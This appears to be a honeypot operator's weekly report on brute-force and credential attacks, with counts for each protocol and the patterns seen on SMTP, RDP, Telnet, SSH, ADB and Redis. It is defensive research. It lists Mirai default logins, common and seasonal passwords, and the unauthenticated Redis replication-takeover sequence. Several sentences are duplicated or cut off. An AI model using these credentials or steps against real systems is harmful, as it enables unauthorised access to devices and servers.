Live observations — 7-day window through 2026-05-30
May 2026
Brute Force & Credential Attacks — What 2.8 Million Auth Attempts Look Like When You Sort Them by Protocol
7 days of credential-relevant traffic across the three sensors. The headline: SMTP and RDP each crossed the 1 million-event mark on their own; SSH and Telnet are still loud but an order of magnitude behind. Fleet total for the 30-day window is ~50 million events; the subset below is the credential-relevant slice — protocols where every connection is either an auth attempt, a banner-grab, or both.
Credential-bearing protocols, last 7 days, fleet-wide
| Protocol | sensor1 (DEV) | sensor2 (PROD) | sensor3 (slim) | Fleet total |
|---|---|---|---|---|
| SMTP SMTP AUTH | 960 083 | 811 009 | — | 1 771 092 |
| RDP Remote Desktop | 30 | 995 547 | 127 | 995 704 |
| Telnet Telnet | — | 510 292 | — | 510 292 |
| SSH SSH | 18 439 | 25 372 | 12 208 | 56 019 |
| ADB Android Debug Bridge | 6 154 | 5 391 | — | 11 545 |
| VNC VNC | — | 6 300 | — | 6 300 |
| Redis Redis AUTH | — | 3 891 | 2 881 | 6 772 |
| Memcached Memcached | — | 1 696 | 1 485 | 3 181 |
| PostgreSQL Postgres + Postgres/SSL | — | 1 764 | 29 | 1 793 |
| FTP FTP | — | 381 | — | 381 |
| MySQL MySQL | 12 | 66 | 63 | 141 |
Per-protocol — the shape of the traffic
SMTP
1.77M SMTP-AUTH attempts in 7 days — the loudest single surface in the fleet
Both sensor1 and sensor2 carry roughly equal SMTP load (960K and
811K respectively) and they see the same shape. The honeypot
advertises Postfix on port 25/587/465 with AUTH PLAIN, AUTH LOGIN,
and AUTH CRAM-MD5 enabled.
The traffic is dominated by two patterns: credential stuffing from compromised lists (mostly common-business-domain usernames against weak passwords like
The 2026-05-11 rewrite of
The traffic is dominated by two patterns: credential stuffing from compromised lists (mostly common-business-domain usernames against weak passwords like
welcome1,
P@ssw0rd, the locale name of the apparent country),
and open-relay testing (RCPT TO header
checks, MAIL FROM spoofing attempts). Our honeypot answers
with the right authentication-failure response codes so the
attacker sees a coherent Postfix profile and keeps trying.
The 2026-05-11 rewrite of
hp_smtp.py to enforce
RFC 5321/4954 exactly is what pulled SMTP from a 100K/week
surface up to 1M+/week — the more closely the honeypot
mimics real Postfix, the more the credential-stuffing kits
include it in their rotation.
RDP
996K RDP attempts on sensor2 alone — the PROD surface is a Windows AD honeypot
sensor2 carries essentially all of the RDP volume because the
PROD profile advertises a Windows Server 2019 domain controller
(hostname
Almost all traffic is NLA (Network Level Authentication) credential attempts with usernames like
sensor1 and sensor3 each see only ~100 RDP hits in the same window — the PROD AD-honeypot advertisement is what attracts the volume; without it, RDP is a slow drip.
WIN-DC01, domain CORP). RDP
credential-bashers find that and don’t leave.
Almost all traffic is NLA (Network Level Authentication) credential attempts with usernames like
Administrator,
admin, user, guest, and
(the dead giveaway for credential-stuffing lists)
Administrator followed by passwords that include the
year — Welcome2024, Spring2025,
Summer2026. The kits update their seasonal password
lists on a calendar.
sensor1 and sensor3 each see only ~100 RDP hits in the same window — the PROD AD-honeypot advertisement is what attracts the volume; without it, RDP is a slow drip.
Telnet
510K Telnet hits on PROD — Mirai-class IoT botnet traffic
Telnet on port 23 is essentially Mirai-and-cousins traffic. The
distinctive shape: connection opens, banner read, ~150 ms pause,
then a fixed credential pair from the Mirai source code default
list (
What lands on the shell is the usual: a wget/curl of an architecture-detect script that pulls the right MIPS/ARM/x86 stage-2 binary. We log the URL and the payload hash; the URLs rotate every few hours because the staging servers get taken down quickly, but the hashes overlap heavily with previously observed Mirai variants.
root/root, root/xc3511,
admin/admin, support/support,
root/vizxv, etc.). On a real exposed device any of
those would log in to a default-config home router; on the
honeypot we authenticate then watch what they try to download.
What lands on the shell is the usual: a wget/curl of an architecture-detect script that pulls the right MIPS/ARM/x86 stage-2 binary. We log the URL and the payload hash; the URLs rotate every few hours because the staging servers get taken down quickly, but the hashes overlap heavily with previously observed Mirai variants.
SSH
56K SSH attempts in 7 days — the steady classical surface
SSH is the most evenly distributed across the fleet: 18K on
sensor1, 25K on sensor2, 12K on sensor3. SSH brute-force tooling
(Hydra, ncrack, custom Go scanners) sweeps the whole IPv4 space
roughly continuously and doesn’t care which version of
OpenSSH we advertise — our profile says
Top usernames are exactly what you’d expect:
One pattern we see consistently and which matters operationally: a noticeable share of SSH brute-force traffic comes from sources that the
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5, plausible
for an Ubuntu 20.04 host.
Top usernames are exactly what you’d expect:
root by a wide margin (~60% of attempts),
admin, user, ubuntu,
git, postgres, oracle,
jenkins, www-data. The top passwords
are similarly canonical — 123456,
password, admin, root,
P@ssw0rd, plus the seasonal variants we see on RDP.
One pattern we see consistently and which matters operationally: a noticeable share of SSH brute-force traffic comes from sources that the
ET INFO SSH-2.0-Go version string rule
(SID 2038967) catches — 2 135 hits over 7 days
on sensor1 alone. These are Go-based scanners (mostly Project
Discovery’s tooling, some custom kits) and they are
currently the largest single SSH-recon family on our wire.
ADB
11.5K Android Debug Bridge probes — the cryptominer pipeline
Android Debug Bridge on TCP/5555 is the canonical attack
surface for the Android-rooted-device cryptominer family. Our
honeypot answers as a Pixel 6 on Android 13 (API level 33). The
traffic is mostly
CNXN connect frames followed by
shell: attempts to run a curl/wget that drops a
cryptominer (usually XMRig variants). Like Mirai, the URLs
rotate fast but the payload hashes overlap with documented
campaigns — this is automated, not targeted.
VNC Redis Memcached
Mid-volume: VNC (6.3K), Redis (6.8K), Memcached (3.2K) — unauthenticated-by-default infrastructure
The middle of the leaderboard is the class of services that ship
without auth on out-of-the-box configs.
VNC (RFB) on 5900: 6.3K hits, all sensor2. Mostly handshake-only probes (security-type negotiation, then disconnect) that match Shodan’s VNC discovery module. A small minority try the standard 8-character-password brute force.
Redis on 6379: 6.8K hits, evenly split between sensor2 and sensor3. The dominant shape is
Memcached on 11211: 3.2K hits, similar split.
VNC (RFB) on 5900: 6.3K hits, all sensor2. Mostly handshake-only probes (security-type negotiation, then disconnect) that match Shodan’s VNC discovery module. A small minority try the standard 8-character-password brute force.
Redis on 6379: 6.8K hits, evenly split between sensor2 and sensor3. The dominant shape is
INFO + CONFIG GET * +
SLAVEOF / REPLICAOF — the canonical recipe
for the unauth-Redis-replication takeover that’s been
documented since 2015 and still works on plenty of cloud-hosted
Redis instances. We don’t accept the SLAVEOF but we log it.
Memcached on 11211: 3.2K hits, similar split.
stats, stats slabs, stats items
for enumeration; the more interesting subset is
DDoS-amplification reflectors testing whether our server is
reachable over UDP for the “memcached reflection”
amplification attack — same one we’ve been seeing
since 2018.
Per-sensor character
Each sensor draws a slightly different attack mix:
- sensor1 (DEV, LAN-DNAT’d) — SMTP-heavy (960K) plus the 17K SSH/ADB long tail. The DNAT path mostly attracts SMTP credential stuffing because the LAN-visible Postfix banner indexes well.
- sensor2 (PROD, Infolab) — the busiest sensor by credential volume. RDP (996K) + SMTP (811K) + Telnet (510K) + SSH (25K) totals over 2.3M auth-relevant events in 7 days. The Windows DC profile is the lure.
- sensor3 (slim, OVH, public IPv4) — the ICMP and TCP/SYN floor are higher (massive raw scanning) but credential-bearing protocols are quieter: SSH (12K), Redis (2.9K), Memcached (1.5K). The slim profile has no AD honeypot, so RDP is essentially zero.
What we keep, what we throw away
At 1.7M SMTP-AUTH attempts a week, we’re not interested in recording every credential pair individually — the same ~1000 username/password combinations recur ad nauseam. What we do keep:
- The full first-time-seen credential pair per source IP per protocol.
- Any credential pair that fires a specific actor / fingerprint classifier rule (e.g. the rondo actor’s UA literal across HTTP, or seasonal-pattern passwords that index a known kit).
- The malware download URL and SHA-256 of every Mirai-/cryptominer-class second-stage payload that we capture from a successful Telnet/ADB shell.
- The full payload trail of any credential attempt that hits a HoneyLens-local SID (9026xxx) so we can correlate the credential event with whatever else the source was doing.
That selectivity lets us track 50M events in a month with the storage budget of a 200K-event archive — while still keeping every prompt that matters.